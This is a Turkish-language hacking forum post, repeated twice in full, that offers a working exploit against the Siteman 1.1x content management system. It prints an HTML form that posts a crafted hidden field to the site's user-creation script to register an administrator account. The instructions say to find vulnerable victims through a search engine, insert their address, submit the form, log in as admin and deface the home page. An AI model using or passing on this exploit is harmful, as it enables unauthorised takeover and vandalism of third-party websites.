siteman 1.1x versiyonunu kullanan sitelerde bu açık sayesinde admin oluştrup siteyi ele geçiriyorsunuz...şimdiden söyeyim her siteman kullanan site de bu açık vardır die bi şi yok...sitenin webmaster i bu açığı kapadıysa şansınıza küs
şimdi kodu veriyorum
Kod:
<html>
<b>These data were recorded.</b><br /><br /><table cellspacing="0"
cellpadding="2"><tr><td>Username(Use this, and not your display name,
when
logging in)</td><td
align="right">lebron</td></tr><tr><td>Password</td><td
align="right"><form><select><option>Click to show password</option>
<option>lebron</option></select></form></td></tr><tr><td>Secret
Question (Asked when you forget your password)</td><td
align="right">lebron</td></tr><tr><td>Answer to secret
question</td><td
align="right"><form>
<select>
<option>Click to show answer</option>
<option>lebron</option>
</select></form>
</td></tr><tr><td>Display name</td><td
align="right">lebron</td></tr><tr><td>Member Level</td><td
align="right"><b>5</b> (Admin)</td></tr><tr><td>email</td><td
align="right">lebron lebron com</td></tr><tr><td>Hide my email
adress</td><td align="right">no</td></tr><tr><td>Forum
Signature</td><td
align="right">hackers</td></table><br /><br />Is this correct?<br
/><table
cellspacing="0" cellpadding="3"><tr><td>
<form action="users.php?do=new" method="post"><input type="submit"
value="no" /></form></td><td>
<form action="http://WWW.SİTEADI.COM/users.php?do=docreate"
method="post">
<input type="hidden" name="line"
value="lebron|347a9a8a8d3f364f0bdb82c4208a3207|5|l ebron lebron com|lebron|1105956827|lebron|347a9a8a8d3f364f0bdb8 2c4208a3207|0|0|0|hackers"
/><input type="submit" value="yes" /></form></html>
yukarıdakikodu koylayaıp bir notepad içine kopyalayıp yapıştırın....
ardından herhangi bir arama motoruna 'Powered by siteman' yazıp arayın...karşınıza bi sürü site çıkacaktır...herhangi birini seçin
ardından notepad içine kopyalayıp yapıştırdığımz kod daki ' http://www.siteadı.com/www.siteadı.com[/URL] ' yazan yere arma motoru ile arattığımız siteman v 1.1x sitelerinden hangisini seçtiysek ' http://www.siteadı.com/www.siteadı.com[/URL] ' yazısını silip seçtiğimiz sitenin adını yazıyoruz...ardında aşağıdaki resimdeki gibi dosya farklı kaydetten dosyamızın uzantısını .html olarak değiştirip farklı kaydediyoruz...
Kaydettikten sonra kaydettiğimz html dosyasını açıyoruz...açtıktan sonra çıkan sayfada password ve answer to secret question olan yerlere lebron u seçin ve en alttaki yes butonuna tıklayın....
işteee eğer önceden de sölediğim gibi webmaster açığı kapamadıysa sitede admin oluşturdnuz demektir eğer direk çıkmazsa umutsuzluğa kapılmayın...
http://www.siteninadı.com/admin.phpwww.siteninadı.com/admin.php[/URL] (site adına hedef siteyi yazıyoruz) burrdan tekrardan girip (kullanıcı adı ve şifreniz lebron dur) tekrar deneyin..
ardından index e kendi kodunuzu yazıp hacked yapabilirsiniz
şimdi kodu veriyorum
Kod:
<html>
<b>These data were recorded.</b><br /><br /><table cellspacing="0"
cellpadding="2"><tr><td>Username(Use this, and not your display name,
when
logging in)</td><td
align="right">lebron</td></tr><tr><td>Password</td><td
align="right"><form><select><option>Click to show password</option>
<option>lebron</option></select></form></td></tr><tr><td>Secret
Question (Asked when you forget your password)</td><td
align="right">lebron</td></tr><tr><td>Answer to secret
question</td><td
align="right"><form>
<select>
<option>Click to show answer</option>
<option>lebron</option>
</select></form>
</td></tr><tr><td>Display name</td><td
align="right">lebron</td></tr><tr><td>Member Level</td><td
align="right"><b>5</b> (Admin)</td></tr><tr><td>email</td><td
align="right">lebron lebron com</td></tr><tr><td>Hide my email
adress</td><td align="right">no</td></tr><tr><td>Forum
Signature</td><td
align="right">hackers</td></table><br /><br />Is this correct?<br
/><table
cellspacing="0" cellpadding="3"><tr><td>
<form action="users.php?do=new" method="post"><input type="submit"
value="no" /></form></td><td>
<form action="http://WWW.SİTEADI.COM/users.php?do=docreate"
method="post">
<input type="hidden" name="line"
value="lebron|347a9a8a8d3f364f0bdb82c4208a3207|5|l ebron lebron com|lebron|1105956827|lebron|347a9a8a8d3f364f0bdb8 2c4208a3207|0|0|0|hackers"
/><input type="submit" value="yes" /></form></html>
yukarıdakikodu koylayaıp bir notepad içine kopyalayıp yapıştırın....
ardından herhangi bir arama motoruna 'Powered by siteman' yazıp arayın...karşınıza bi sürü site çıkacaktır...herhangi birini seçin
ardından notepad içine kopyalayıp yapıştırdığımz kod daki ' http://www.siteadı.com/www.siteadı.com[/URL] ' yazan yere arma motoru ile arattığımız siteman v 1.1x sitelerinden hangisini seçtiysek ' http://www.siteadı.com/www.siteadı.com[/URL] ' yazısını silip seçtiğimiz sitenin adını yazıyoruz...ardında aşağıdaki resimdeki gibi dosya farklı kaydetten dosyamızın uzantısını .html olarak değiştirip farklı kaydediyoruz...
Kaydettikten sonra kaydettiğimz html dosyasını açıyoruz...açtıktan sonra çıkan sayfada password ve answer to secret question olan yerlere lebron u seçin ve en alttaki yes butonuna tıklayın....
işteee eğer önceden de sölediğim gibi webmaster açığı kapamadıysa sitede admin oluşturdnuz demektir eğer direk çıkmazsa umutsuzluğa kapılmayın...
http://www.siteninadı.com/admin.phpwww.siteninadı.com/admin.php[/URL] (site adına hedef siteyi yazıyoruz) burrdan tekrardan girip (kullanıcı adı ve şifreniz lebron dur) tekrar deneyin..
ardından index e kendi kodunuzu yazıp hacked yapabilirsiniz
